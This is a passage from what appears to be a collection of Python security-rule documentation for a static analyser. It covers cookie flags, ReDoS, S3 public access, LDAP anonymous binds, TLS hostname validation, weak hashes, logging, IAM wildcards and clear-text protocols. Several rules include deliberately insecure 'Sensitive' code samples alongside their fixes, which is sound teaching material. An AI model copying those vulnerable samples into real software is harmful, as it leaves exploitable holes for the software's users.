AES supports three key sizes: 128 bits, 192 bits and 256 bits. The security of the AES algorithm is based on the computational complexity of trying all possible keys.
A larger key size increases the number of possible keys and makes exhaustive search attacks computationally infeasible. Therefore, a 256-bit key provides a higher level of security than a 128-bit or 192-bit key.

Currently, a minimum key size of 128 bits is recommended for AES.
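For symmetric algorithms, key generation reduces to secure random bytes; a minimal stdlib sketch of a 256-bit AES key:

```python
import os

# Symmetric keys are plain random bytes: a 256-bit AES key is 32
# cryptographically secure random bytes.
key = os.urandom(32)
assert len(key) * 8 == 256
```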

Elliptic Curve Cryptography (ECC)

Elliptic curve cryptography is also used in various algorithms, such as ECDSA, ECDH, or ECMQV. The length of keys generated with elliptic curve algorithms is indicated directly in their names. For example, secp256k1 generates a 256-bit private key.

Currently, a minimum key size of 224 bits is recommended for EC algorithms.

Going the extra mile

Pre-Quantum Cryptography

Encrypted data and communications recorded today could be decrypted in the future by an attack from a quantum computer.
It is important to keep in mind that NIST-approved digital signature schemes, key agreement, and key transport may need to be replaced with secure quantum-resistant (or "post-quantum") counterparts.

Thus, if data is to remain secure beyond 2030, proactive measures should be taken now to ensure its safety.


Resources

Articles & blog posts

Standards

python:S3330

When a cookie is configured with the HttpOnly attribute set to true, the browser guarantees that no client-side script will be able to read it. In most cases, when a cookie is created, the default value of HttpOnly is false, and it is up to the developer to decide whether the content of the cookie can be read by client-side scripts. Because the majority of Cross-Site Scripting (XSS) attacks target the theft of session cookies, the HttpOnly attribute helps reduce their impact: an XSS vulnerability cannot then be exploited to steal session cookies.

Ask Yourself Whether

  • the cookie is sensitive, used to authenticate the user, for instance a session cookie
  • the HttpOnly attribute offers additional protection (this is not the case for an XSRF-TOKEN cookie / CSRF token, for example)

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • By default, the HttpOnly flag should be set to true for most cookies, and it is mandatory for session / security-sensitive cookies.
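Outside of Flask, the same flag can be seen with the standard library's http.cookies module — a minimal sketch of building a Set-Cookie header with HttpOnly (and Secure) enabled:

```python
from http.cookies import SimpleCookie

cookie = SimpleCookie()
cookie['session'] = 'opaque-token'
cookie['session']['httponly'] = True   # not readable from client-side script
cookie['session']['secure'] = True     # only sent over HTTPS

header = cookie.output(header='Set-Cookie:')
assert 'HttpOnly' in header and 'Secure' in header
```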

Sensitive Code Example

Flask:

from flask import Response

@app.route('/')
def index():
    response = Response()
    response.set_cookie('key', 'value') # Sensitive
    return response

Compliant Solution

Flask:

from flask import Response

@app.route('/')
def index():
    response = Response()
    response.set_cookie('key', 'value', httponly=True) # Compliant
    return response

See

python:S4784

This rule is deprecated; use S5852, S2631 instead.

Using regular expressions is security-sensitive. It has led in the past to the following vulnerabilities:

Evaluating regular expressions against input strings is potentially an extremely CPU-intensive task. Specially crafted regular expressions such as (a+)+s will take several seconds to evaluate the input string aaaaaaaaaaaaaaaaaaaaaaaaaaaaabs. The problem is that with every additional a character added to the input, the time required to evaluate the regex doubles. However, the equivalent regular expression, a+s (without grouping) is efficiently evaluated in milliseconds and scales linearly with the input size.

Evaluating such regular expressions opens the door to Regular expression Denial of Service (ReDoS) attacks. In the context of a web application, attackers can force the web server to spend all of its resources evaluating regular expressions thereby making the service inaccessible to genuine users.

This rule flags any execution of a hardcoded regular expression which has at least 3 characters and at least two instances of any of the following characters: *+{ .

Example: (a+)*

Ask Yourself Whether

  • the executed regular expression is sensitive and a user can provide a string which will be analyzed by this regular expression.
  • your regular expression engine's performance decreases with specially crafted inputs and regular expressions.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Check whether your regular expression engine (the algorithm executing your regular expression) has any known vulnerabilities. Search for vulnerability reports mentioning the engine you are using.

If possible, use a library that is not vulnerable to ReDoS attacks, such as Google RE2.

Remember also that a ReDoS attack is possible if a user-provided regular expression is executed. This rule won't detect that kind of injection.
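The equivalence described above — replacing a nested quantifier with a linear pattern that matches the same language — can be checked on small inputs:

```python
import re

# '(a*)*b' backtracks catastrophically on non-matching input; the
# equivalent 'a*b' matches the same language in linear time.
vulnerable = re.compile(r'(a*)*b')
safe = re.compile(r'a*b')

# Both patterns accept and reject the same (short) strings.
for candidate in ['b', 'ab', 'aaab', 'aaa', '']:
    assert bool(vulnerable.fullmatch(candidate)) == bool(safe.fullmatch(candidate))
```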

Sensitive Code Example

Django

from django.core.validators import RegexValidator
from django.urls import re_path

RegexValidator('(a*)*b')  # Sensitive

def define_http_endpoint(view):
    re_path(r'^(a*)*b/$', view)  # Sensitive

re module

import re
from re import compile, match, search, fullmatch, split, findall, finditer, sub, subn


input = 'input string'
replacement = 'replacement'

re.compile('(a*)*b')  # Sensitive
re.match('(a*)*b', input)  # Sensitive
re.search('(a*)*b', input)  # Sensitive
re.fullmatch('(a*)*b', input)  # Sensitive
re.split('(a*)*b', input)  # Sensitive
re.findall('(a*)*b', input)  # Sensitive
re.finditer('(a*)*b',input)  # Sensitive
re.sub('(a*)*b', replacement, input)  # Sensitive
re.subn('(a*)*b', replacement, input)  # Sensitive

regex module

import regex
from regex import compile, match, search, fullmatch, split, findall, finditer, sub, subn, subf, subfn, splititer

input = 'input string'
replacement = 'replacement'

regex.subf('(a*)*b', replacement, input)  # Sensitive
regex.subfn('(a*)*b', replacement, input)  # Sensitive
regex.splititer('(a*)*b', input)  # Sensitive

regex.compile('(a*)*b')  # Sensitive
regex.match('(a*)*b', input)  # Sensitive
regex.search('(a*)*b', input)  # Sensitive
regex.fullmatch('(a*)*b', input)  # Sensitive
regex.split('(a*)*b', input)  # Sensitive
regex.findall('(a*)*b', input)  # Sensitive
regex.finditer('(a*)*b',input)  # Sensitive
regex.sub('(a*)*b', replacement, input)  # Sensitive
regex.subn('(a*)*b', replacement, input)  # Sensitive

Exceptions

Some corner-case regular expressions will not raise an issue even though they might be vulnerable. For example: (a|aa)+, (a|a?)+.

It is a good idea to test your regular expression if it has the same pattern on both sides of a "|".

See

python:S6281

By default, S3 buckets are private: only the bucket owner can access them.

This access control can be relaxed with ACLs or policies.

To prevent permissive policies from being set on an S3 bucket, the following boolean settings can be enabled:

  • block_public_acls: whether to block public ACLs from being set on the S3 bucket.
  • ignore_public_acls: whether to ignore existing public ACLs set on the S3 bucket.
  • block_public_policy: whether to block public policies from being set on the S3 bucket.
  • restrict_public_buckets: whether to restrict access to the S3 endpoints of public policies to the principals within the bucket owner account.

The attribute BlockPublicAccess.BLOCK_ACLS only turns on block_public_acls and ignore_public_acls; public policies can still affect the S3 bucket.

However, all of those options can be enabled by setting the block_public_access property of the S3 bucket to BlockPublicAccess.BLOCK_ALL.

Ask Yourself Whether

  • The S3 bucket stores sensitive data.
  • The S3 bucket is not used to store static resources of websites (images, css …​).
  • Many users have the permission to set ACL or policy to the S3 bucket.
  • These settings are not already enforced to true at the account level.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to configure:

  • block_public_acls to True to block new attempts to set public ACLs.
  • ignore_public_acls to True to block existing public ACLs.
  • block_public_policy to True to block new attempts to set public policies.
  • restrict_public_buckets to True to restrict existing public policies.

Sensitive Code Example

By default, when not set, block_public_access is fully deactivated (nothing is blocked):

bucket = s3.Bucket(self,
    "bucket"        # Sensitive
)

This block_public_access allows public ACLs to be set:

bucket = s3.Bucket(self,
    "bucket",
    block_public_access=s3.BlockPublicAccess(
        block_public_acls=False,       # Sensitive
        ignore_public_acls=True,
        block_public_policy=True,
        restrict_public_buckets=True
    )
)

The attribute BLOCK_ACLS only blocks and ignores public ACLs:

bucket = s3.Bucket(self,
    "bucket",
    block_public_access=s3.BlockPublicAccess.BLOCK_ACLS     # Sensitive
)

Compliant Solution

This block_public_access blocks public ACLs and policies, ignores existing public ACLs and restricts existing public policies:

bucket = s3.Bucket(self,
    "bucket",
    block_public_access=s3.BlockPublicAccess.BLOCK_ALL # Compliant
)

A similar configuration to the one above can be obtained by setting all parameters of block_public_access explicitly:

bucket = s3.Bucket(self, "bucket",
    block_public_access=s3.BlockPublicAccess(       # Compliant
        block_public_acls=True,
        ignore_public_acls=True,
        block_public_policy=True,
        restrict_public_buckets=True
    )
)

See

python:S2257

The use of a non-standard algorithm is dangerous because a determined attacker may be able to break the algorithm and compromise whatever data has been protected. Standard algorithms like Argon2PasswordHasher, BCryptPasswordHasher, …​ should be used instead.

This rule tracks the creation of BasePasswordHasher subclasses in Django applications.

Recommended Secure Coding Practices

  • Use a standard algorithm instead of creating a custom one.

Sensitive Code Example

class CustomPasswordHasher(BasePasswordHasher):  # Sensitive
    # ...

See

python:S4433

Lightweight Directory Access Protocol (LDAP) servers provide two main authentication methods: the SASL and Simple ones. The Simple Authentication method also breaks down into three different mechanisms:

  • Anonymous Authentication
  • Unauthenticated Authentication
  • Name/Password Authentication

A server that accepts either the Anonymous or Unauthenticated mechanisms will accept connections from clients not providing credentials.

Why is this an issue?

When configured to accept the Anonymous or Unauthenticated authentication mechanism, an LDAP server will accept connections from clients that do not provide a password or other authentication credentials. Such users will be able to read or modify part or all of the data contained in the hosted directory.

What is the potential impact?

An attacker exploiting unauthenticated access to an LDAP server can access the data that is stored in the corresponding directory. The impact varies depending on the permission obtained on the directory and the type of data it stores.

Authentication bypass

If attackers get write access to the directory, they will be able to alter most of the data it stores. This might include sensitive technical data such as user passwords or asset configurations. Such an attack can typically lead to an authentication bypass on applications and systems that use the affected directory as an identity provider.

In such a case, all users configured in the directory might see their identity and privileges taken over.

Sensitive information leak

If attackers get read-only access to the directory, they will be able to read the data it stores. That data might include security-sensitive pieces of information.

Typically, attackers might get access to user account lists that they can use in further intrusion steps. For example, they could use such lists to perform password spraying, or related attacks, on all systems that rely on the affected directory as an identity provider.

If the directory contains some Personally Identifiable Information, an attacker accessing it might represent a violation of regulatory requirements in some countries. For example, this kind of security event would go against the European GDPR law.

How to fix it

Code examples

The following code indicates an anonymous LDAP authentication vulnerability because it binds to a remote server using an Anonymous Simple authentication mechanism.

Noncompliant code example

import ldap

def init_ldap():
   connect = ldap.initialize('ldap://example:1389')

   connect.simple_bind('cn=root') # Noncompliant
   connect.simple_bind_s('cn=root') # Noncompliant
   connect.bind_s('cn=root', None) # Noncompliant
   connect.bind('cn=root', None) # Noncompliant

Compliant solution

import ldap
import os

def init_ldap():
   connect = ldap.initialize('ldap://example:1389')

   connect.simple_bind('cn=root', os.environ.get('LDAP_PASSWORD'))
   connect.simple_bind_s('cn=root', os.environ.get('LDAP_PASSWORD'))
   connect.bind_s('cn=root', os.environ.get('LDAP_PASSWORD'))
   connect.bind('cn=root', os.environ.get('LDAP_PASSWORD'))
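As an extra safeguard, client code can refuse to bind when credentials are missing, since a bind with a DN but an empty password falls back to the Unauthenticated mechanism on many servers. A minimal sketch (safe_simple_bind is a hypothetical helper wrapping python-ldap's simple_bind_s):

```python
# Hypothetical guard: RFC 4513 treats a bind with a DN but an empty
# password as "Unauthenticated Authentication", which many servers
# silently accept. Rejecting empty credentials client-side avoids
# accidentally opening that door.
def safe_simple_bind(connection, dn, password):
    if not dn or not password:
        raise ValueError("refusing anonymous/unauthenticated LDAP bind")
    return connection.simple_bind_s(dn, password)
```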

Resources

Documentation

Standards

python:S5527

This vulnerability allows attackers to impersonate a trusted host.

Why is this an issue?

Transport Layer Security (TLS) provides secure communication between systems over the internet by encrypting the data sent between them. In this process, the role of hostname validation, combined with certificate validation, is to ensure that a system is indeed the one it claims to be, adding an extra layer of trust and security.

When hostname validation is disabled, the client skips this critical check. This creates an opportunity for attackers to pose as a trusted entity and intercept, manipulate, or steal the data being transmitted.

To do so, an attacker would obtain a valid certificate authenticating example.com, serve it using a different hostname, and the application code would still accept it.

What is the potential impact?

Establishing trust in a secure way is a non-trivial task. When you disable hostname validation, you are removing a key mechanism designed to build this trust in internet communication, opening your system up to a number of potential threats.

Identity spoofing

If a system does not validate hostnames, it cannot confirm the identity of the other party involved in the communication. An attacker can exploit this by creating a fake server and masquerading it as a legitimate one. For example, they might set up a server that looks like your bank’s server, tricking your system into thinking it is communicating with the bank. This scenario, called identity spoofing, allows the attacker to collect any data your system sends to them, potentially leading to significant data breaches.

How to fix it in Python Standard Library

Code examples

The following code contains examples of disabled hostname validation.

Certificate validation is not enabled by default when _create_unverified_context or _create_stdlib_context is used. It is recommended to use create_default_context, without explicitly setting check_hostname to False.
Doing so creates a secure context that validates both hostnames and certificates.

Noncompliant code example

import ssl

example = ssl._create_stdlib_context() # Noncompliant

example = ssl._create_default_https_context()
example.check_hostname = False # Noncompliant

Compliant solution

import ssl

example = ssl.create_default_context()

example = ssl._create_default_https_context()
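The secure defaults can be verified directly: ssl.create_default_context() enables both hostname and certificate validation out of the box:

```python
import ssl

# create_default_context() enables certificate validation and hostname
# checking by default; no further configuration is needed.
ctx = ssl.create_default_context()
assert ctx.check_hostname is True
assert ctx.verify_mode == ssl.CERT_REQUIRED
```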

How does this work?

To fix the vulnerability of disabled hostname validation, it is strongly recommended to first re-enable the default validation and fix the root cause: the validity of the certificate.

Use valid certificates

If a hostname validation failure prevents connecting to the target server, keep in mind that one system’s code should not work around another system’s problems, as this creates unnecessary dependencies and can lead to reliability issues.

Therefore, the first solution is to change the remote host’s certificate to match its identity. If the remote host is not under your control, consider replicating its service to a server whose certificate you can change yourself.

In case the contacted host is located on a development machine, and if there is no other choice, try following this solution:

  • Create a self-signed certificate for that machine.
  • Add this self-signed certificate to the system’s trust store.
  • If the hostname is not localhost, add the hostname in the /etc/hosts file.

Resources

Standards

python:S4790

Cryptographic hash algorithms such as MD2, MD4, MD5, MD6, HAVAL-128, HMAC-MD5, DSA (which uses SHA-1), RIPEMD, RIPEMD-128, RIPEMD-160, HMACRIPEMD160 and SHA-1 are no longer considered secure, because it is possible to have collisions (little computational effort is enough to find two or more different inputs that produce the same hash).

Ask Yourself Whether

The hashed value is used in a security context like:

  • User-password storage.
  • Security token generation (used to confirm e-mail when registering on a website, reset password, etc …​).
  • To compute some message integrity.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Safer alternatives, such as SHA-256, SHA-512, SHA-3 are recommended, and for password hashing, it’s even better to use algorithms that do not compute too "quickly", like bcrypt, scrypt, argon2 or pbkdf2 because it slows down brute force attacks.
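As a stdlib sketch of a deliberately slow password hash (the cost parameters here are illustrative), hashlib.scrypt is memory-hard, and verification should use a constant-time comparison:

```python
import hashlib
import hmac
import os

def hash_password(password: bytes, salt: bytes) -> bytes:
    # scrypt is deliberately memory-hard, which slows brute-force attacks.
    return hashlib.scrypt(password, salt=salt, n=2**14, r=8, p=1, dklen=32)

salt = os.urandom(16)
stored = hash_password(b'hunter2', salt)

# Constant-time comparison when verifying a login attempt.
assert hmac.compare_digest(stored, hash_password(b'hunter2', salt))
assert not hmac.compare_digest(stored, hash_password(b'wrong', salt))
```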

Sensitive Code Example

import hashlib
m = hashlib.md5()  # Sensitive

import hashlib
m = hashlib.sha1()  # Sensitive

import md5  # Sensitive and deprecated since Python 2.5; use the hashlib module instead.
m = md5.new()

import sha  # Sensitive and deprecated since Python 2.5; use the hashlib module instead.
m = sha.new()

Compliant Solution

import hashlib
m = hashlib.sha512()  # Compliant

See

python:S4792

Configuring loggers is security-sensitive. It has led in the past to the following vulnerabilities:

Logs are useful before, during and after a security incident.

  • Attackers will most of the time start their nefarious work by probing the system for vulnerabilities. Monitoring this activity and stopping it is the first step to prevent an attack from ever happening.
  • In case of a successful attack, logs should contain enough information to understand what damage an attacker may have inflicted.

Logs are also a target for attackers because they might contain sensitive information. Configuring loggers has an impact on the type of information logged and how they are logged.

This rule flags for review code that initiates loggers configuration. The goal is to guide security code reviews.

Ask Yourself Whether

  • unauthorized users might have access to the logs, either because they are stored in an insecure location or because the application gives access to them.
  • the logs contain sensitive information on a production server. This can happen when the logger is in debug mode.
  • the logs can grow without limit. This can happen when additional information is written into the logs every time a user performs an action and the user can perform the action as many times as they want.
  • the logs do not contain enough information to understand the damage an attacker might have inflicted. The logger's mode (info, warn, error) might filter out important information, and might not record contextual information like the precise time of events or the server hostname.
  • the logs are only stored locally instead of being backed up or replicated.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Check that your production deployment doesn’t have its loggers in "debug" mode as it might write sensitive information in logs.
  • Production logs should be stored in a secure location which is only accessible to system administrators.
  • Configure the loggers to display all warnings, info and error messages. Write relevant information such as the precise time of events and the hostname.
  • Choose log format which is easy to parse and process automatically. It is important to process logs rapidly in case of an attack so that the impact is known and limited.
  • Check that the permissions of the log files are correct. If you index the logs in some other service, make sure that the transfer and the service are secure too.
  • Add limits to the size of the logs and make sure that no user can fill the disk with logs. This can happen even when the user does not control the logged information. An attacker could just repeat a logged action many times.
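The size-limit advice above can be sketched with the standard library's RotatingFileHandler, which caps each log file and the number of backups (the file path and limits here are illustrative):

```python
import logging
import os
import tempfile
from logging.handlers import RotatingFileHandler

# Cap total log size: at most 5 backup files of 1 MB each, so an attacker
# repeating a logged action cannot fill the disk.
log_path = os.path.join(tempfile.mkdtemp(), 'app.log')
handler = RotatingFileHandler(log_path, maxBytes=1_000_000, backupCount=5)
handler.setFormatter(
    logging.Formatter('%(asctime)s %(levelname)s %(name)s %(message)s'))

logger = logging.getLogger('audit')
logger.addHandler(handler)
logger.setLevel(logging.INFO)

# Record security-relevant events with enough context.
logger.info('failed login for user id=%s', 42)
handler.flush()
```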

Remember that configuring loggers properly doesn't make them bullet-proof. Here is a list of recommendations on how to use your logs:

  • Don't log any sensitive information. This obviously includes passwords and credit card numbers, but also any personal information such as user names, locations, etc. Usually, any information protected by law is a good candidate for removal.
  • Sanitize all user inputs before writing them to the logs. This includes checking size, content, encoding, syntax, etc. As for any user input, validate using whitelists whenever possible. Letting users write what they want in your logs can have many impacts. It could, for example, use all your storage space or compromise your log indexing service.
  • Log enough information to monitor suspicious activities and evaluate the impact an attacker might have on your systems. Register events such as failed logins, successful logins, server side input validation failures, access denials and any important transaction.
  • Monitor the logs for any suspicious activity.

Sensitive Code Example

import logging
from logging import Logger, Handler, Filter
from logging.config import fileConfig, dictConfig

logging.basicConfig()  # Sensitive

logging.disable()  # Sensitive


def update_logging(logger_class):
    logging.setLoggerClass(logger_class)  # Sensitive


def set_last_resort(last_resort):
    logging.lastResort = last_resort  # Sensitive


class CustomLogger(Logger):  # Sensitive
    pass


class CustomHandler(Handler):  # Sensitive
    pass


class CustomFilter(Filter):  # Sensitive
    pass


def update_config(path, config):
    fileConfig(path)  # Sensitive
    dictConfig(config)  # Sensitive

See

python:S6304

A policy that allows identities to access all resources in an AWS account may violate the principle of least privilege. Suppose an identity has permission to access all resources even though it only requires access to some non-sensitive ones. In this case, unauthorized access to and disclosure of sensitive information can occur.

Ask Yourself Whether

The AWS account has more than one resource with different levels of sensitivity.

A risk exists if you answered yes to this question.

Recommended Secure Coding Practices

It’s recommended to apply the least privilege principle, i.e., to only grant access to necessary resources. A good practice to achieve this is to organize or tag resources depending on the sensitivity level of the data they store or process; this makes secure access control less error-prone.

Sensitive Code Example

The wildcard "*" is specified as the resource for this PolicyStatement. This grants the update permission for all policies of the account:

from aws_cdk.aws_iam import Effect, PolicyDocument, PolicyStatement

PolicyDocument(
    statements=[
        PolicyStatement(
            effect=Effect.ALLOW,
            actions=["iam:CreatePolicyVersion"],
            resources=["*"] # Sensitive
        )
    ]
)

Compliant Solution

Restrict the update permission to the appropriate subset of policies:

from aws_cdk import Aws
from aws_cdk.aws_iam import Effect, PolicyDocument, PolicyStatement

PolicyDocument(
    statements=[
        PolicyStatement(
            effect=Effect.ALLOW,
            actions=["iam:CreatePolicyVersion"],
            resources=[f"arn:aws:iam::{Aws.ACCOUNT_ID}:policy/team1/*"]
        )
    ]
)

Exceptions

  • Should not be raised on key policies (when AWS KMS actions are used.)
  • Should not be raised on policies not using any resources (if and only if all actions in the policy never require resources.)

See

python:S5332

Clear-text protocols such as ftp, telnet, or http lack encryption of transported data, as well as the capability to build an authenticated connection. It means that an attacker able to sniff traffic from the network can read, modify, or corrupt the transported content. These protocols are not secure as they expose applications to an extensive range of risks:

  • sensitive data exposure
  • traffic redirected to a malicious endpoint
  • malware-infected software update or installer
  • execution of client-side code
  • corruption of critical information

Even in the context of isolated networks like offline environments or segmented cloud environments, the insider threat exists. Thus, attacks involving communications being sniffed or tampered with can still happen.

For example, attackers could successfully compromise prior security layers by:

  • bypassing isolation mechanisms
  • compromising a component of the network
  • getting the credentials of an internal IAM account (either from a service account or an actual person)

In such cases, encrypting communications decreases the chances that attackers successfully leak data or steal credentials from other network components. By layering various security practices (segmentation and encryption, for example), the application will follow the defense-in-depth principle.

Note that using the http protocol is being deprecated by major web browsers.

In the past, it has led to the following vulnerabilities:

Ask Yourself Whether

  • Application data needs to be protected against falsifications or leaks when transiting over the network.
  • Application data transits over an untrusted network.
  • Compliance rules require the service to encrypt data in transit.
  • Your application renders web pages with a relaxed mixed content policy.
  • OS-level protections against clear-text traffic are deactivated.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Make application data transit over a secure, authenticated and encrypted protocol like TLS or SSH. Here are a few alternatives to the most common clear-text protocols:
    • Use ssh as an alternative to telnet.
    • Use sftp, scp, or ftps instead of ftp.
    • Use https instead of http.
    • Use SMTP over SSL/TLS or SMTP with STARTTLS instead of clear-text SMTP.
  • Enable encryption of cloud components communications whenever it is possible.
  • Configure your application to block mixed content when rendering web pages.
  • If available, enforce OS-level deactivation of all clear-text traffic.

It is recommended to secure all transport channels, even on local networks, as it can take a single non-secure connection to compromise an entire application or system.
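As a small illustration of auditing for clear-text protocols, the following hypothetical helper (is_clear_text and its scheme set are not part of any library) flags URLs before a connection is attempted:

```python
from urllib.parse import urlparse

# Schemes that transport data without encryption or authentication.
CLEAR_TEXT_SCHEMES = {'http', 'ftp', 'telnet'}

def is_clear_text(url: str) -> bool:
    # Parse the URL and check its scheme against the clear-text set.
    return urlparse(url).scheme.lower() in CLEAR_TEXT_SCHEMES

assert is_clear_text('http://example.com')
assert is_clear_text('ftp://anonymous@example.com')
assert not is_clear_text('https://example.com')
assert not is_clear_text('sftp://example.com')
```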

Sensitive Code Example

url = "http://example.com" # Sensitive
url = "ftp://anonymous@example.com" # Sensitive
url = "telnet://anonymous@example.com" # Sensitive

import telnetlib
cnx = telnetlib.Telnet("towel.blinkenlights.nl") # Sensitive

import ftplib
cnx = ftplib.FTP("ftp.example.com") # Sensitive

import smtplib
smtp = smtplib.SMTP("smtp.example.com", port=587) # Sensitive

For aws_cdk.aws_elasticloadbalancingv2.ApplicationLoadBalancer:

from aws_cdk import (
    aws_elasticloadbalancingv2 as elbv2,
)

lb = elbv2.ApplicationLoadBalancer(
    self,
    "LB",
    vpc=vpc,
    internet_facing=True
)

lb.add_listener(
    "Listener-default",
    port=80, # Sensitive
    open=True
)
lb.add_listener(
    "Listener-http-explicit",
    protocol=elbv2.ApplicationProtocol.HTTP, # Sensitive
    port=8080,
    open=True
)

For aws_cdk.aws_elasticloadbalancingv2.ApplicationListener:

from aws_cdk import (
    aws_elasticloadbalancingv2 as elbv2,
)

elbv2.ApplicationListener(
    self,
    "listener-http-explicit-const",
    load_balancer=lb,
    protocol=elbv2.ApplicationProtocol.HTTP, # Sensitive
    port=8081,
    open=True
)

For aws_cdk.aws_elasticloadbalancingv2.NetworkLoadBalancer:

from aws_cdk import (
    aws_elasticloadbalancingv2 as elbv2,
)
lb = elbv2.NetworkLoadBalancer(
    self,
    "LB",
    vpc=vpc,
    internet_facing=True
)

lb.add_listener( # Sensitive
    "Listener-default",
    port=1234
)
lb.add_listener(
    "Listener-TCP-explicit",
    protocol=elbv2.Protocol.TCP, # Sensitive
    port=1337
)

For aws_cdk.aws_elasticloadbalancingv2.NetworkListener:

from aws_cdk import (
    aws_elasticloadbalancingv2 as elbv2,
)

elbv2.NetworkListener(
    self,
    "Listener-TCP-explicit",
    protocol=elbv2.Protocol.TCP, # Sensitive
    port=1338,
    load_balancer=lb
)

For aws_cdk.aws_elasticloadbalancingv2.CfnListener:

from aws_cdk import (
    aws_elasticloadbalancingv2 as elbv2,
)

elbv2.CfnListener(
    self,
    "listener-http",
    default_actions=[application_default_action],
    load_balancer_arn=lb.load_balancer_arn,
    protocol="HTTP", # Sensitive
    port=80
)

elbv2.CfnListener(
    self,
    "listener-tcp",
    default_actions=[network_default_action],
    load_balancer_arn=lb.load_balancer_arn,
    protocol="TCP", # Sensitive
    port=1000
)

For aws_cdk.aws_elasticloadbalancing.LoadBalancerListener:

from aws_cdk import (
    aws_elasticloadbalancing as elb,
)

elb.LoadBalancerListener(
    external_port=10000,
    external_protocol=elb.LoadBalancingProtocol.TCP, # Sensitive
    internal_port=10000
)

elb.LoadBalancerListener(
    external_port=10080,
    external_protocol=elb.LoadBalancingProtocol.HTTP, # Sensitive
    internal_port=10080
)

For aws_cdk.aws_elasticloadbalancing.CfnLoadBalancer:

from aws_cdk import (
    aws_elasticloadbalancing as elb
)

elb.CfnLoadBalancer(
    self,
    "elb-tcp",
    listeners=[
        elb.CfnLoadBalancer.ListenersProperty(
            instance_port="10000",
            load_balancer_port="10000",
            protocol="tcp" # Sensitive
        )
    ],
    subnets=vpc.select_subnets().subnet_ids
)

elb.CfnLoadBalancer(
    self,
    "elb-http-dict",
    listeners=[
        {
            "instancePort":"10000",
            "loadBalancerPort":"10000",
            "protocol":"http" # Sensitive
        }
    ],
    subnets=vpc.select_subnets().subnet_ids
)

For aws_cdk.aws_elasticloadbalancing.LoadBalancer:

from aws_cdk import (
    aws_elasticloadbalancing as elb,
)

loadBalancer = elb.LoadBalancer(
    self,
    "elb-tcp-dict",
    vpc=vpc,
    listeners=[
        {
            "externalPort":10000,
            "externalProtocol":elb.LoadBalancingProtocol.TCP, # Sensitive
            "internalPort":10000
        }
    ]
)

loadBalancer.add_listener(
    external_port=10081,
    external_protocol=elb.LoadBalancingProtocol.HTTP, # Sensitive
    internal_port=10081
)
loadBalancer.add_listener(
    external_port=10001,
    external_protocol=elb.LoadBalancingProtocol.TCP, # Sensitive
    internal_port=10001
)

For aws_cdk.aws_elasticache.CfnReplicationGroup:

from aws_cdk import (
    aws_elasticache as elasticache
)

elasticache.CfnReplicationGroup(
    self,
    "unencrypted-explicit",
    replication_group_description="a replication group",
    automatic_failover_enabled=False,
    transit_encryption_enabled=False, # Sensitive
    cache_subnet_group_name="test",
    engine="redis",
    engine_version="3.2.6",
    num_cache_clusters=1,
    cache_node_type="cache.t2.micro"
)

elasticache.CfnReplicationGroup( # Sensitive, encryption is disabled by default
    self,
    "unencrypted-implicit",
    replication_group_description="a test replication group",
    automatic_failover_enabled=False,
    cache_subnet_group_name="test",
    engine="redis",
    engine_version="3.2.6",
    num_cache_clusters=1,
    cache_node_type="cache.t2.micro"
)

For aws_cdk.aws_kinesis.CfnStream:

from aws_cdk import (
    aws_kinesis as kinesis,
)

kinesis.CfnStream( # Sensitive, encryption is disabled by default for CfnStreams
    self,
    "cfnstream-implicit-unencrypted",
    shard_count=1
)

kinesis.CfnStream(self,
    "cfnstream-explicit-unencrypted",
    shard_count=1,
    stream_encryption=None # Sensitive
)

For aws_cdk.aws_kinesis.Stream:

from aws_cdk import (
    aws_kinesis as kinesis,
)

stream = kinesis.Stream(self,
    "stream-explicit-unencrypted",
    shard_count=1,
    encryption=kinesis.StreamEncryption.UNENCRYPTED # Sensitive
)

Compliant Solution

url = "https://example.com"
url = "sftp://anonymous@example.com"
url = "ssh://anonymous@example.com"

import ftplib
cnx = ftplib.FTP_TLS("ftp.example.com")

import smtplib
import ssl

context = ssl.create_default_context()
smtp = smtplib.SMTP("smtp.example.com", port=587)
smtp.starttls(context=context)

smtp_ssl = smtplib.SMTP_SSL("smtp.gmail.com", port=465)

For aws_cdk.aws_elasticloadbalancingv2.ApplicationLoadBalancer:

from aws_cdk import (
    aws_elasticloadbalancingv2 as elbv2,
)

lb = elbv2.ApplicationLoadBalancer(
    self,
    "LB",
    vpc=vpc,
    internet_facing=True
)

lb.add_listener(
    "Listener-https-explicit",
    protocol=elbv2.ApplicationProtocol.HTTPS,
    certificates=[elbv2.ListenerCertificate("certificateARN")],
    port=443,
    open=True
)

lb.add_listener(
    "Listener-https-implicit",
    certificates=[elbv2.ListenerCertificate("certificateARN")],
    port=8443,
    open=True
)

For aws_cdk.aws_elasticloadbalancingv2.ApplicationListener:

from aws_cdk import (
    aws_elasticloadbalancingv2 as elbv2,
)

elbv2.ApplicationListener(
    self,
    "listener-https-explicit-const",
    load_balancer=lb,
    protocol=elbv2.ApplicationProtocol.HTTPS,
    certificates=[elbv2.ListenerCertificate("certificateARN")],
    port=444,
    open=True
)

For aws_cdk.aws_elasticloadbalancingv2.NetworkLoadBalancer:

from aws_cdk import (
    aws_elasticloadbalancingv2 as elbv2,
)
lb = elbv2.NetworkLoadBalancer(
    self,
    "LB",
    vpc=vpc,
    internet_facing=True
)

lb.add_listener(
    "Listener-TLS-explicit",
    protocol=elbv2.Protocol.TLS,
    certificates=[elbv2.ListenerCertificate("certificateARN")],
    port=443
)
lb.add_listener(
    "Listener-TLS-implicit",
    certificates=[elbv2.ListenerCertificate("certificateARN")],
    port=1024
)

For aws_cdk.aws_elasticloadbalancingv2.NetworkListener:

from aws_cdk import (
    aws_elasticloadbalancingv2 as elbv2,
)

elbv2.NetworkListener(
    self,
    "Listener-TLS-explicit",
    protocol=elbv2.Protocol.TLS,
    certificates=[elbv2.ListenerCertificate("certificateARN")],
    port=443,
    load_balancer=lb
)

For aws_cdk.aws_elasticloadbalancingv2.CfnListener:

from aws_cdk import (
    aws_elasticloadbalancingv2 as elbv2,
)

elbv2.CfnListener(
    self,
    "listener-https",
    default_actions=[application_default_action],
    load_balancer_arn=lb.load_balancer_arn,
    protocol="HTTPS",
    port=443,
    certificates=[elbv2.CfnListener.CertificateProperty(
        certificate_arn="certificateARN"
    )]
)

elbv2.CfnListener(
    self,
    "listener-tls",
